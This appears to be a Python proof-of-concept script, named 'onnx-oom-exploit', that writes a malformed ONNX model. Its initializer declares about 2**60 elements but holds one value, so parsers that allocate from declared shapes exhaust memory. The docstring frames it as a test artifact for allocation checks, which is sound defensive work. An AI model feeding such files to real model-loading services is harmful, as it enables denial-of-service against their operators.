File size: 1,321 Bytes
a551f75
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import onnx
from onnx import helper, TensorProto
import struct

def create_oom_onnx(output_path, dims=None):
    """Build and save an ONNX model whose initializer declares huge dimensions.

    The single initializer carries only one float value but declares a shape
    whose element count is astronomically large (default 2**60 elements), so a
    parser that allocates a buffer from the declared shape *before* checking
    the actual payload size will attempt an enormous allocation. This is a
    test artifact for exercising OOM / allocation-validation handling in ONNX
    consumers.

    Args:
        output_path: Filesystem path the serialized model is written to.
        dims: Optional list of initializer dimensions. Defaults to
            [2**30, 2**30] (2**60 declared elements), preserving the
            original behavior.
    """
    print("[*] Creating ONNX model with huge initializer dimensions...")

    # Default huge dimensions: 2^30 * 2^30 = 2^60 declared elements.
    if dims is None:
        dims = [1024 * 1024 * 1024, 1024 * 1024 * 1024]

    # NOTE(review): recent onnx.helper.make_tensor releases validate that
    # len(vals) matches the product of dims and raise ValueError on mismatch,
    # which would prevent this file from being created at all — confirm the
    # pinned onnx version tolerates the deliberate mismatch.
    initializer = helper.make_tensor(
        name="huge_tensor",
        data_type=TensorProto.FLOAT,
        dims=dims,
        vals=[1.0],  # one real value; some parsers allocate from dims first
        raw=False,
    )

    # Identity node so the graph is non-trivial and references the initializer.
    node_def = helper.make_node("Identity", ["huge_tensor"], ["output"])
    graph_def = helper.make_graph(
        [node_def],
        "oom-graph",
        [],  # no graph inputs: the Identity node reads the initializer
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])],
        initializer=[initializer],
    )

    model_def = helper.make_model(
        graph_def,
        producer_name="onnx-oom-exploit",
        opset_imports=[onnx.helper.make_opsetid("ai.onnx", 19)],
    )
    onnx.save(model_def, output_path)
    print(f"[+] Model saved to {output_path}")

if __name__ == "__main__":
    create_oom_onnx("/tmp/oom.onnx")